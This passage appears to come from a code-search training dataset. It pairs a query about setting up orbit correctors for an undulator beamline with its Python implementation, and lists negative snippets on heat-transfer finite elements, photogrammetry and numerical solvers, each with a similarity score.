self.thermal_conductivity) / \\\r\n (self.convect_coeff)\r\n else:\r\n self.Beta = (1.0 + 3.0 * self.r2) * (2.0 * self.diff_scale) / \\\r\n ((1.0 - 2.0 * self.r1) * (\r\n 3.0 * self.absorb_coeffs[self.rad]))\r\n\r\n # The feild solutions at the last timestep.\r\n # The integral vF:\r\n if self.cond == True:\r\n # The horrifically complicated F:\r\n def F_func_cond(elem, eta):\r\n F = 0.0\r\n Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]\r\n F += Tn\r\n for k in range(0, len(self.fq_list)):\r\n vk = self.fq_list[k]\r\n try:\r\n vk_m = self.fq_list[k - 1]\r\n except:\r\n vk_m = self.v0_frequency\r\n absorbtion = self.absorb_coeffs[k]\r\n phi = elem.eval_elem(self.node_map, self.lst_rad[k],\r\n [eta])[0]\r\n inter1 = phi - 4.0 * sconst.pi * \\\r\n self.B_int_function(Tn, self.refr_idx_vol,\r\n vk, vk_m)\r\n inter2 = absorbtion * self.d_T / (self.diff_scale ** 2)\r\n F += inter2 * inter1\r\n return elem.funcs(eta) * F\r\n if not no_rad:\r\n # We're integrating something non-linear for SP1\r\n self.vF_vect_vol = et.elems_2_array(self.mesh,\r\n F_func_cond,\r\n self.node_map)\r\n else:\r\n # Or something easier if we're only looking at heat.\r\n self.vF_vect_vol = np.array(self.uv_vol * lst_tmp).reshape(-1)\r\n else:\r\n def F_func_radiative(elem, eta):\r\n T = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]\r\n vk = self.fq_list[self.rad]\r\n try:\r\n vk_minus = self.fq_list[self.rad - 1]\r\n except:\r\n vk_minus = self.v0_frequency\r\n n = self.refr_idx_vol\r\n F = 4.0 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)\r\n return elem.funcs(eta) * F\r\n\r\n self.vF_vect_vol = et.elems_2_array(self.mesh,\r\n F_func_radiative,\r\n self.node_map)\r\n # The path integral vf:\r\n if self.cond == True:\r\n def f_func_cond(elem, eta):\r\n Tb = self.background_temperature\r\n Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]\r\n n = self.refr_idx_background\r\n vk = self.v0_frequency\r\n vk_minus = 0\r\n Bb0 = self.B_int_function(Tb, n, vk, vk_minus)\r\n Bn0 = self.B_int_function(Tn, n, vk, vk_minus)\r\n B_coeff = (self.alpha * sconst.pi) / self.convect_coeff\r\n f = Tb + B_coeff * (Bb0 - Bn0)\r\n return elem.funcs(eta) * f\r\n if not no_rad:\r\n self.vf_vect_bound = et.edge_2_array(self.mesh,\r\n \"Boundary\",\r\n f_func_cond,\r\n self.node_map)\r\n else:\r\n try:\r\n self.vf_vect_bound = self.cache_tb_integral_array\r\n except AttributeError:\r\n def elem_functor(elem, eta): return elem.funcs(eta)\r\n self.cache_tb_integral_array = et.edge_2_array(self.mesh,\r\n \"Boundary\",\r\n elem_functor,\r\n self.node_map)\r\n self.cache_tb_integral_array *= self.background_temperature\r\n self.vf_vect_bound = self.cache_tb_integral_array\r\n \r\n else:\r\n # Radiation f = 4*pi*B^{(k)}(T_b, n_g)\r\n def f_func_radiative(elem, eta):\r\n T = self.background_temperature\r\n vk = self.fq_list[self.rad]\r\n try:\r\n vk_minus = self.fq_list[self.rad - 1]\r\n except:\r\n vk_minus = self.v0_frequency\r\n n = self.refr_idx_vol\r\n f = 4 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)\r\n return elem.funcs(eta) * f\r\n\r\n self.vf_vect_bound = et.edge_2_array(self.mesh,\r\n \"Boundary\",\r\n f_func_radiative,\r\n self.node_map)\r\n assert (self.vF_vect_vol.size == self.vF_vect_vol.shape[0])\r\n assert (self.vf_vect_bound.size == self.vf_vect_bound.shape[0])\r\n assert (self.vf_vect_bound.shape[0] == \\\r\n self.vF_vect_vol.shape[0])", "def __ComputeApproximateVals_RzRyRz(self, cameraPoints, groundPoints):\n\n # Find approximate values\n cameraPoints = cameraPoints.reshape(np.size(cameraPoints), 1)\n groundPointsXY = groundPoints[0:2, :].T\n groundPointsXY = groundPointsXY.reshape(np.size(groundPointsXY), 1)\n groundPointsZ = groundPoints[2, :].T\n\n n = int(len(cameraPoints)) # number of observations\n u = 4 # 4 conform parameters\n\n A = np.zeros((n, u)) # A matrix (n,u)\n\n j = 0\n for i in range(len(cameraPoints)):\n if i % 2 == 0:\n A[i, 0] = 1\n A[i, 1] = 0\n A[i, 2] = cameraPoints[j]\n A[i, 3] = cameraPoints[j + 1]\n else:\n A[i, 0] = 0\n A[i, 1] = 1\n A[i, 2] = cameraPoints[j + 1]\n A[i, 3] = -cameraPoints[j]\n j += 2\n\n X = np.dot(la.inv(np.dot(np.transpose(A), A)), np.dot(np.transpose(A), groundPointsXY))\n\n # now we can compute the rest of the params\n X0 = X[0]\n Y0 = X[1]\n kappa = np.arctan2(-X[3], X[2])\n lam = np.sqrt(X[2] ** 2 + X[3] ** 2)\n Z0 = np.average(groundPointsZ) + (lam) * self.camera.focalLength\n\n adjustment_results = {\"X0\": X0[0], \"Y0\": Y0[0], \"Z0\": Z0[0], \"omega\": 0, \"phi\": 0,\n \"kappa\": np.rad2deg(kappa[0])}\n\n self.__exteriorOrientationParameters = np.array(\n [X0[0], Y0[0], Z0[0], 0.2, 0.2, kappa[0]]).T # updating the exterior orientation params\n # self.__exteriorOrientationParameters = np.array([202225, 742447, 657.81, 0, 0, kappa[0]]).T\n #return adjustment_results", "def solver(u_init, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = 1e-3, max_iter = 5000, verbose = 0, nnls_max_iter=30):\n\n # Raise('NotImplementedError: only adjusted the arguments.')\n #Need to incorporate L_lhs into stacked and appropriate w_lin updates, u_update and eta_lin increments\n #precompute the expensive operation:\n lin_penalties = 1/np.sqrt(2*eta_lin)\n eta_T_H_L_stacked = scipy.sparse.vstack([T.multiply(1/np.sqrt(2*eta_0))] + [H[i].multiply(1/np.sqrt(2*eta[i])) for i in range(len(H))] + [L_lhs.multiply(lin_penalties[:,None])])\n #!!!!\n# premultiplied_lhs = eta_T_H_stacked.T.dot(eta_T_H_stacked).toarray()\n #!!!!\n u_prev = u_init + 1\n u = u_init\n count = 0\n obj_history = []\n relaxed_obj_history = [-1, 0.1] #just two initial values to enter the loop\n while np.abs((relaxed_obj_history[-2] - relaxed_obj_history[-1])/relaxed_obj_history[-2]) > ftol and count < max_iter:#np.linalg.norm(u - u_prev, np.inf) > 1e-3 and count < max_iter: #Maybe all of them stop changing\n start = time.time()\n \n u_prev = np.copy(u)\n w_0 = w_0_update(eta_0, u, T, alpha, B) \n w = w_update(u, H, gamma, D, C) \n w_lin = w_lin_update(u, L_lhs, L_rhs)\n# u = u_update(eta_0, eta, w_0, w, eta_T_H_stacked, nnls_max_iter=50)\n #!!!!\n # u = u_update(eta_0, eta, w_0, w, eta_T_H_L_stacked, nnls_max_iter=30)\n u = u_update(eta_0, eta, eta_lin, w_0, w, w_lin, eta_T_H_L_stacked, premultiplied_lhs = None, nnls_max_iter=nnls_max_iter)\n #!!!!\n count += 1 \n if count == 10:\n u_inf = np.copy(u)\n w_0_inf = w_0[:]\n w_inf = w[:]\n w_lin_inf = w_lin[:]\n if count > 10 and np.abs(cur_obj) > 1e+15: #HANDLE THIS BETTER!!!\n print('INFINITY! RETURNING u at the 10-th iteration to enter the feasibility loop')\n return u_inf, w_0_inf, w_inf, w_lin_inf, obj_history, relaxed_obj_history\n \n cur_obj = obj_u_opt_N_fixed(u, T, alpha, B)\n obj_history.append(cur_obj)\n cur_relaxed_obj = relaxed_obj_u_opt_N_fixed(u, w_0, w, w_lin, eta_0, eta, eta_lin, T, H, L_lhs, alpha, B)\n # relaxed_obj_u_opt_N_fixed(u, w_0, w, eta_0, eta, T, H, alpha, B)\n relaxed_obj_history.append(cur_relaxed_obj) \n \n stop = time.time()\n duration = stop-start\n \n if count%1 == 0 and verbose: \n stopping_criterion = np.abs((relaxed_obj_history[-2] - relaxed_obj_history[-1])/relaxed_obj_history[-2])\n print(' iter = {}, stopping criterion:{}, OBJ {}'.format(count, stopping_criterion, cur_obj))\n print(' This iteration took: {}'.format(duration))\n return u, w_0, w, w_lin, obj_history, relaxed_obj_history", "def potentialSolver(self, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # solve potential\n for it in np.arange(1,max_it+1):\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n\n R = -self.phi[i][j][k]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1])\n\n sum += R*R;\n\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n \n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged" ]
[ "0.6054454", "0.6029055", "0.6029055", "0.6029055", "0.59086585", "0.5886708", "0.585231", "0.58431363", "0.57428247", "0.57226473", "0.56672513", "0.5646705", "0.5617193", "0.5610204", "0.56079906", "0.5607317", "0.55761766", "0.5571415", "0.5559164", "0.55436873", "0.5521621", "0.55207", "0.55093014", "0.5499706", "0.5499667", "0.54869825", "0.5486826", "0.54728913", "0.5470154", "0.54368365", "0.5433071", "0.54319227", "0.5422952", "0.5409021", "0.54012144", "0.53964734", "0.5388829", "0.53859365", "0.53741527", "0.53734934", "0.5373185", "0.53530705", "0.534997", "0.5342046", "0.53376067", "0.5331183", "0.5327867", "0.53251654", "0.5322697", "0.53155565", "0.5309603", "0.52899045", "0.5287648", "0.52862257", "0.5281322", "0.52755153", "0.52585393", "0.5254314", "0.5254259", "0.52516496", "0.5249529", "0.5249105", "0.5248174", "0.52410614", "0.5230499", "0.5229494", "0.52263767", "0.52238584", "0.52238584", "0.52192396", "0.5209829", "0.5207622", "0.52060604", "0.52039814", "0.5196565", "0.5195603", "0.51884896", "0.51810807", "0.5176612", "0.51712227", "0.5169783", "0.5167931", "0.51669854", "0.51662415", "0.51635164", "0.5162033", "0.5157795", "0.51550794", "0.5151991", "0.5149914", "0.5149888", "0.51492214", "0.51488674", "0.51453954", "0.51448333", "0.51448166", "0.51445514", "0.5140667", "0.5139292", "0.51387143" ]
0.56180215
12
I want to use this function to directly set up all orbit correctors.
def set_up_orbit_correctors(ps_beg, delay, id_slice1, ds_slice, zplot, id_slices, U_core, lambdaref): SXSS = Chicane(3.2716, 0.362, 0.830399, delay[0]) HXSS = Chicane(3.2, 0.3636, 0.5828, delay[1]) OC2 = [CORR08, D1_SXSS, SXSS, D2_SXSS, QUAD09, CORR09] OC3 = [CORR15, D1_HXSS, HXSS, D2_HXSS, QUAD16, CORR16] ps_end1 = beam_transportation(ps_beg, U_core[0]) # ps_end1 is a 4-by-N array. N is the number of macro-particles. It is the full # 4D phase space distribution at the end of the first undulator section. # The id of the slice on the axis in the second undulator section on_axis_id_U2 = int(id_slice1+delay[0]/ds_slice+ (8*110)*lambdaref/ds_slice) # The last part is slippage print(on_axis_id_U2) ps_end_slice1 = beam_property_along_s(ps_end1, id_slices)[0:4, :] ps_on_axis_2 = np.ravel(ps_end_slice1[:, on_axis_id_U2]) # print(ps_on_axis_2) OC2_optimized = analyze_orbit_corrector(OC2[0], OC2[-1], OC2[1:-1], ps_on_axis_2) print(OC2_optimized) CORR08_new = Orbit_Corrector(OC2[0].length, OC2_optimized[0], OC2_optimized[2]) CORR09_new = Orbit_Corrector(OC2[-1].length, OC2_optimized[1], OC2_optimized[3]) # The whole U2 with optimized orbit correctors U2_new = [CORR08_new] + OC2[1:-1] + [CORR09_new] + U_core[1] ps_end2 = beam_transportation(ps_end1, U2_new) # ps_end2 is a 4-by-N array. N is the number of macro-particles. It is the full # 4D phase space distribution at the end of the second undulator section. # The id of the slice on the axis in the third undulator section on_axis_id_U3 = int(id_slice1+(delay[0]+delay[1])/ds_slice +(14*110*lambdaref)/ds_slice) # The last term is the slipage print(on_axis_id_U3) ps_end_slice2 = beam_property_along_s(ps_end2, id_slices)[0:4, :] ps_on_axis_3 = np.ravel(ps_end_slice2[ :, on_axis_id_U3]) # print(ps_on_axis_3) OC3_optimized = analyze_orbit_corrector(OC3[0], OC3[-1], OC3[1:-1], ps_on_axis_3) print(OC3_optimized) CORR15_new = Orbit_Corrector(OC3[0].length, OC3_optimized[0], OC3_optimized[2]) CORR16_new = Orbit_Corrector(OC3[-1].length, OC3_optimized[1], OC3_optimized[3]) U3_new = [CORR15_new] + OC3[1:-1] + [CORR16_new] + U_core[2] Undulator_Beamline = U_core[0]+U2_new+U3_new return Undulator_Beamline
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setUp(self):\n self.precip_cube = setup_precipitation_cube()\n self.oe_cube = setup_orographic_enhancement_cube()\n self.vel_x = set_up_xy_velocity_cube(\"advection_velocity_x\")\n self.vel_y = set_up_xy_velocity_cube(\"advection_velocity_y\")\n for cube in [self.precip_cube, self.oe_cube]:\n cube.coord(\"projection_x_coordinate\").points = 600 * np.arange(3)\n cube.coord(\"projection_y_coordinate\").points = 600 * np.arange(4)", "def setup_orbit(self, t, halo_gas_density, galaxy_velocity):\n \n if any( [halo_gas_density > 1.0E-10] ) : # convert to mass density\n halo_gas_density = halo_gas_density * self.ic['mu_halo'] * cgs.mp\n \n # if t is an array, then use a cubic spline to make a function from the orbital\n # data. If t is a single value, then halo gas dnesity and velocity are constants..\n # make them into functions anyway to make rest of everything work...\n if np.size(halo_gas_density) > 1 : \n self.halo_density = interpolate.UnivariateSpline(t, halo_gas_density,k=3)\n else:\n self.halo_density = lambda x: halo_gas_density\n \n if np.size(galaxy_velocity) > 1:\n self.galaxy_velocity = interpolate.UnivariateSpline(t, galaxy_velocity ,k=3)\n else:\n self.galaxy_velocity = lambda x: galaxy_velocity", "def set_up_all_ao(self):\n self.set_as_active()\n \n # sets up ambient occlusion lighting\n self.set_up_world_ao()\n self.comp_add_ao()", "def set_up_world_ao(self):\n scene = self.set_as_active()\n new_world = bpy.context.blend_data.worlds.new('World of Wireframe')\n scene.world = new_world\n new_world.light_settings.use_ambient_occlusion = True\n new_world.light_settings.ao_factor = 0.3\n\n renderengine = scene.wirebomb.data_renderengine\n\n if renderengine == 'CYCLES':\n new_world.use_nodes = True\n new_world.node_tree.nodes[1].inputs[0].default_value = (1, 1, 1, 1)\n\n for node in new_world.node_tree.nodes:\n node.select = False\n \n elif renderengine == 'BLENDER_RENDER':\n new_world.horizon_color = (1, 1, 1)", "def setup(self):\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.Motor_A_EN, GPIO.OUT)\n GPIO.setup(self.Motor_B_EN, GPIO.OUT)\n GPIO.setup(self.Motor_A_Pin1, GPIO.OUT)\n GPIO.setup(self.Motor_A_Pin2, GPIO.OUT)\n GPIO.setup(self.Motor_B_Pin1, GPIO.OUT)\n GPIO.setup(self.Motor_B_Pin2, GPIO.OUT)\n self.motorStop() # Avoids automatic motor rotation after initialization\n try: # Try is used here to avoid errors due to repeated setting of PWM\n self.pwm_A = GPIO.PWM(self.Motor_A_EN, 1000)\n self.pwm_B = GPIO.PWM(self.Motor_B_EN, 1000)\n except:\n pass", "def set_oceanic_modes(self, basis, auto=True):\n if self._atmospheric_basis is None: # Presently, the ocean can not yet be set independently of an atmosphere.\n print('Atmosphere modes not set up. Add an atmosphere before adding an ocean!')\n print('Oceanic setup aborted.')\n return\n\n if auto:\n if self.gotemperature_params is None or isinstance(self.gotemperature_params, GroundTemperatureParams):\n self.gotemperature_params = OceanicTemperatureParams(self.scale_params)\n if self.oceanic_params is None:\n self.oceanic_params = OceanicParams(self.scale_params)\n\n self.ground_params = None\n self._ground_basis = None\n\n self.oceanic_basis = basis\n\n self._oceanic_latex_var_string = list()\n self._oceanic_var_string = list()\n self._ground_latex_var_string = list()\n self._ground_var_string = list()\n for i in range(1, self.nmod[1] + 1):\n self._oceanic_latex_var_string.append(r'psi_{\\rm o,' + str(i) + \"}\")\n self._oceanic_var_string.append(r'psi_o_' + str(i))\n if self.dynamic_T:\n self._oceanic_latex_var_string.append(r', T_{{\\rm o},0}')\n self._oceanic_var_string.append(r'T_o_0')\n for i in range(1, self.nmod[1] + 1):\n self._oceanic_latex_var_string.append(r'delta T_{{\\rm o},' + str(i) + \"}\")\n self._oceanic_var_string.append(r'delta_T_o_' + str(i))", "def setup(self):\n\n self._enable_torque(self._reg.TORQUE_ENABLE)\n self.change_operating_mode(self._reg.MODE_EXT_POSI)\n # set to max velocity\n self.change_veloity(self._default_velocity)", "def __init__(self):\n print(\"Initializing system...\"),\n for i in range(0,self.numAtoms):\n self.atoms.append(Atom())\n self.assignPositions()\n self.applyBoltzmannDist()\n self.correctMomenta()\n print(\"done.\")\n print(\"Simulation is now running.\")", "def setUp(self):\n from ampscan.core import AmpObject\n # Load 2 spheres with radius 1, and 1.2\n stl_path = get_path(\"stl_file_5.stl\") # R=1\n self.amp1 = AmpObject(stl_path)\n stl_path = get_path(\"stl_file_4.stl\") # R=1.2\n self.amp2 = AmpObject(stl_path)\n stl_path = get_path(\"stl_file.stl\")\n self.amp3 = AmpObject(stl_path)\n self.amp4 = AmpObject(stl_path)\n stl_path = get_path(\"cone1.stl\")\n self.cone1 = AmpObject(stl_path)\n stl_path = get_path(\"cone2.stl\")\n self.cone2 = AmpObject(stl_path)", "def __init__(self):\n\n # Loop over the models.\n for model_index in range(len(MODELS)):\n # Aliases.\n model = MODELS[model_index]\n model_text = MODEL_TEXT[model_index]\n\n # Loop over the tags.\n for tag in TAGS:\n # Set up the variables to loop over.\n if model in ['rotor', 'free_rotor']:\n vars = ['Z']\n elif model in ['iso_cone_free_rotor', 'iso_cone_torsionless']:\n vars = ['X']\n elif model in ['iso_cone']:\n vars = ['X', 'Z']\n elif model in ['double_rotor', 'pseudo-ellipse_free_rotor', 'pseudo-ellipse_torsionless']:\n vars = ['X', 'Y']\n elif model in ['pseudo-ellipse']:\n vars = ['X', 'Y', 'Z']\n else:\n raise RelaxError(\"Unknown model '%s'.\" % model)\n\n # Loop over the variables.\n for var in vars:\n # The file name.\n file_name = '_%s_%s_theta_%s_calc.agr' % (model, tag, lower(var))\n print(\"Creating the '*%s' files.\" % file_name)\n\n # Set up the eigenframe.\n self.setup_eigenframe(tag=tag)\n\n # The Kronecker product of the eigenframe rotation.\n Rx2_eigen = kron_prod(self.eigenframe, self.eigenframe)\n\n # Set the initial storage structures.\n self.init_storage()\n\n # Loop over the angle incs.\n for i in range(INC+1):\n # Get the angle for the increment.\n theta = self.get_angle(i-1, model=model, var=var)\n\n # Vary X.\n if var == 'X':\n theta_x = theta\n theta_y = THETA_Y\n theta_z = THETA_Z\n\n # Vary Y.\n elif var == 'Y':\n theta_x = THETA_X\n theta_y = theta\n theta_z = THETA_Z\n\n # Vary Z.\n elif var == 'Z':\n theta_x = THETA_X\n theta_y = THETA_Y\n theta_z = theta\n\n # Calculate the frame order matrices.\n if model == 'rotor':\n self.first_frame_order[i] = rotor.compile_1st_matrix_rotor(self.first_frame_order[i], self.eigenframe, theta_z)\n self.second_frame_order[i] = rotor.compile_2nd_matrix_rotor(self.second_frame_order[i], Rx2_eigen, theta_z)\n elif model == 'free_rotor':\n self.first_frame_order[i] = free_rotor.compile_1st_matrix_free_rotor(self.first_frame_order[i], self.eigenframe)\n self.second_frame_order[i] = free_rotor.compile_2nd_matrix_free_rotor(self.second_frame_order[i], Rx2_eigen)\n elif model == 'iso_cone':\n self.first_frame_order[i] = iso_cone.compile_1st_matrix_iso_cone(self.first_frame_order[i], self.eigenframe, theta_x, theta_z)\n self.second_frame_order[i] = iso_cone.compile_2nd_matrix_iso_cone(self.second_frame_order[i], Rx2_eigen, theta_x, theta_z)\n elif model == 'iso_cone_free_rotor':\n self.first_frame_order[i] = iso_cone_free_rotor.compile_1st_matrix_iso_cone_free_rotor(self.first_frame_order[i], self.eigenframe, theta_x)\n self.second_frame_order[i] = iso_cone_free_rotor.compile_2nd_matrix_iso_cone_free_rotor(self.second_frame_order[i], Rx2_eigen, theta_x)\n elif model == 'iso_cone_torsionless':\n self.first_frame_order[i] = iso_cone_torsionless.compile_1st_matrix_iso_cone_torsionless(self.first_frame_order[i], self.eigenframe, theta_x)\n self.second_frame_order[i] = iso_cone_torsionless.compile_2nd_matrix_iso_cone_torsionless(self.second_frame_order[i], Rx2_eigen, theta_x)\n elif model == 'pseudo-ellipse':\n self.first_frame_order[i] = pseudo_ellipse.compile_1st_matrix_pseudo_ellipse(self.first_frame_order[i], self.eigenframe, theta_x, theta_y, theta_z)\n self.second_frame_order[i] = pseudo_ellipse.compile_2nd_matrix_pseudo_ellipse(self.second_frame_order[i], Rx2_eigen, theta_x, theta_y, theta_z)\n elif model == 'pseudo-ellipse_free_rotor':\n self.first_frame_order[i] = pseudo_ellipse_free_rotor.compile_1st_matrix_pseudo_ellipse_free_rotor(self.first_frame_order[i], self.eigenframe, theta_x, theta_y)\n self.second_frame_order[i] = pseudo_ellipse_free_rotor.compile_2nd_matrix_pseudo_ellipse_free_rotor(self.second_frame_order[i], Rx2_eigen, theta_x, theta_y)\n elif model == 'pseudo-ellipse_torsionless':\n self.first_frame_order[i] = pseudo_ellipse_torsionless.compile_1st_matrix_pseudo_ellipse_torsionless(self.first_frame_order[i], self.eigenframe, theta_x, theta_y)\n self.second_frame_order[i] = pseudo_ellipse_torsionless.compile_2nd_matrix_pseudo_ellipse_torsionless(self.second_frame_order[i], Rx2_eigen, theta_x, theta_y)\n elif model == 'double_rotor':\n self.first_frame_order[i] = double_rotor.compile_1st_matrix_double_rotor(self.first_frame_order[i], self.eigenframe, theta_y, theta_x)\n self.second_frame_order[i] = double_rotor.compile_2nd_matrix_double_rotor(self.second_frame_order[i], Rx2_eigen, theta_y, theta_x)\n else:\n raise RelaxError(\"Unknown model '%s'.\" % model)\n\n # Write the data.\n self.write_data(file_name=file_name, model=model, model_text=model_text, var=var)", "def __init__(self, eqn_set=0, atmosphere=0, ra_steps=(1, 1e3, 40, True),\n kx_steps=(0.01, 1, 40, True), ky_steps=None, threeD=False, atmo_kwargs={}, eqn_args=[],\n eqn_kwargs={}, bc_kwargs={}):\n self._eqn_set = eqn_set\n self._atmosphere = atmosphere\n self._ra_steps = ra_steps\n self._kx_steps = kx_steps\n self._ky_steps = ky_steps\n self.threeD = threeD\n\n self._atmo_kwargs = atmo_kwargs\n self._eqn_args = eqn_args\n self._eqn_kwargs = eqn_kwargs\n self._bc_kwargs = bc_kwargs\n self.cf = CriticalFinder(self.solve_problem, CW)", "def initialize(self):\n self._setup_simulation_from_parameters()\n if \"orrb\" in self.constants.observation_providers:\n self._reset()\n self._goal = self._next_goal()\n self.update_goal_info()\n\n self.observer = self._build_observer()", "def init(self):\n self.l_motor = lazytalonsrx.LazyTalonSRX(Constants.IL_MOTOR_ID)\n self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.IR_MOTOR_ID)\n self.l_motor.initialize(\n inverted=False, encoder=False, phase=False, name=\"Intake Left\")\n self.r_motor.initialize(\n inverted=True, encoder=False, phase=False, name=\"Intake Right\")", "def setup_initial_state(self):\n # collect the ids of vehicles in the network\n self.ids = self.vehicles.get_ids()\n self.controlled_ids = self.vehicles.get_controlled_ids()\n self.sumo_ids = self.vehicles.get_sumo_ids()\n self.rl_ids = self.vehicles.get_rl_ids()\n\n # dictionary of initial observations used while resetting vehicles after\n # each rollout\n self.initial_observations = dict.fromkeys(self.ids)\n\n # create the list of colors used to different between different types of\n # vehicles visually on sumo's gui\n #TODO: Get these colors working!\n # self.colors = {(255,0,0), (0,255,0),(0,0,255),(255,255,255)}\n self.colors = {}\n key_index = 1\n color_choice = np.random.choice(len(COLORS))\n for i in range(self.vehicles.num_types):\n self.colors[self.vehicles.types[i]] = \\\n COLORS[(color_choice + key_index) % len(COLORS)]\n key_index += 1\n\n for veh_id in self.ids:\n # set the colors of the vehicles based on their unique types\n veh_type = self.vehicles.get_state(veh_id, \"type\")\n self.traci_connection.vehicle.setColor(veh_id,\n self.colors[veh_type])\n\n # add the initial states to the vehicles class\n self.vehicles.set_edge(\n veh_id, self.traci_connection.vehicle.getRoadID(veh_id))\n self.vehicles.set_position(\n veh_id, self.traci_connection.vehicle.getLanePosition(veh_id))\n self.vehicles.set_lane(\n veh_id, self.traci_connection.vehicle.getLaneIndex(veh_id))\n self.vehicles.set_speed(\n veh_id, self.traci_connection.vehicle.getSpeed(veh_id))\n self.vehicles.set_route(\n veh_id, self.available_routes[self.vehicles.get_edge(veh_id)])\n self.vehicles.set_absolute_position(\n veh_id, self.get_x_by_id(veh_id))\n # the time step of the last lane change is always present in\n # the environment,but only used by sub-classes that apply lane\n # changing\n self.vehicles.set_state(veh_id, \"last_lc\",\n -1 * self.lane_change_duration)\n # some constant vehicle parameters\n self.vehicles.set_state(\n veh_id, \"length\",\n self.traci_connection.vehicle.getLength(veh_id))\n self.vehicles.set_state(veh_id, \"max_speed\", self.max_speed)\n\n # import initial state data to initial_observations dict\n self.initial_observations[veh_id] = dict()\n self.initial_observations[veh_id][\"type\"] = veh_type\n self.initial_observations[veh_id][\"edge\"] = \\\n self.traci_connection.vehicle.getRoadID(veh_id)\n self.initial_observations[veh_id][\"position\"] = \\\n self.traci_connection.vehicle.getLanePosition(veh_id)\n self.initial_observations[veh_id][\"lane\"] = \\\n self.traci_connection.vehicle.getLaneIndex(veh_id)\n self.initial_observations[veh_id][\"speed\"] = \\\n self.traci_connection.vehicle.getSpeed(veh_id)\n self.initial_observations[veh_id][\"route\"] = \\\n self.available_routes[self.initial_observations[veh_id][\"edge\"]]\n self.initial_observations[veh_id][\"absolute_position\"] = \\\n self.get_x_by_id(veh_id)\n\n # set speed mode\n self.set_speed_mode(veh_id)\n\n # set lane change mode\n self.set_lane_change_mode(veh_id)\n\n # save the initial state. This is used in the _reset function\n #\n route_id = \"route\" + self.initial_observations[veh_id][\"edge\"]\n pos = self.traci_connection.vehicle.getPosition(veh_id)\n\n self.initial_state[veh_id] = \\\n (self.initial_observations[veh_id][\"type\"], route_id,\n self.initial_observations[veh_id][\"lane\"],\n self.initial_observations[veh_id][\"position\"],\n self.initial_observations[veh_id][\"speed\"], pos)\n\n # collect list of sorted vehicle ids\n self.sorted_ids, self.sorted_extra_data = self.sort_by_position()\n\n # collect headway, leader id, and follower id data\n for veh_id in self.ids:\n headway = self.traci_connection.vehicle.getLeader(veh_id, 2000)\n if headway is None:\n self.vehicles.set_leader(veh_id, None)\n self.vehicles.set_headway(veh_id, 9e9)\n else:\n self.vehicles.set_leader(veh_id, headway[0])\n self.vehicles.set_headway(veh_id, headway[1])\n self.vehicles.set_follower(headway[0], veh_id)\n\n # contains the last lc before the current step\n self.prev_last_lc = dict()\n for veh_id in self.ids:\n self.prev_last_lc[veh_id] = self.vehicles.get_state(veh_id,\n \"last_lc\")\n\n # subscribe the requested states for traci-related speedups\n for veh_id in self.ids:\n self.traci_connection.vehicle.subscribe(\n veh_id, [tc.VAR_LANE_INDEX, tc.VAR_LANEPOSITION,\n tc.VAR_ROAD_ID, tc.VAR_SPEED])\n self.traci_connection.vehicle.subscribeLeader(veh_id, 2000)", "def _setup(self) -> None:\n # Call base implementation\n super()._setup()\n\n # Configure the low-level integrator\n engine_options = self.simulator.engine.get_options()\n engine_options[\"stepper\"][\"iterMax\"] = 0\n engine_options[\"stepper\"][\"dtMax\"] = min(0.02, self.step_dt)\n engine_options[\"stepper\"][\"logInternalStepperSteps\"] = False\n\n # Set maximum computation time for single internal integration steps\n if self.debug:\n engine_options[\"stepper\"][\"timeout\"] = 0.0\n else:\n engine_options[\"stepper\"][\"timeout\"] = 2.0\n\n # Enable logging of geometries in debug mode\n if self.debug:\n engine_options[\"telemetry\"][\"isPersistent\"] = True\n\n # Update engine options\n self.simulator.engine.set_options(engine_options)\n\n # Set robot in neutral configuration\n qpos = self._neutral()\n framesForwardKinematics(\n self.robot.pinocchio_model, self.robot.pinocchio_data, qpos)", "def setUp(self):\n self.OR_Neuron = Neuron([12, 12], Sigmoid().activate, bias=-6)", "def _propagateOrbits(self, orbits, t1):\n err = \"This backend does not have orbit propagation implemented.\"\n raise NotImplementedError(err)", "def __init__(self):\n BasicEngine.__init__(self)\n self._active_qubits = 0\n self._num_rotations = 0\n self._rotations = []", "def initialize_plot_options(config):\n\n OP = orbit_plots.OrbitPlots()\n\n # target information\n OP.target = OP.title = config.get('plotting', 'target', fallback='')\n OP.Hip = config.getint('data_paths', 'HipID', fallback=0)\n OP.nplanets = config.getint('mcmc_settings', 'nplanets')\n\n # read data\n OP.RVfile = config.get('data_paths', 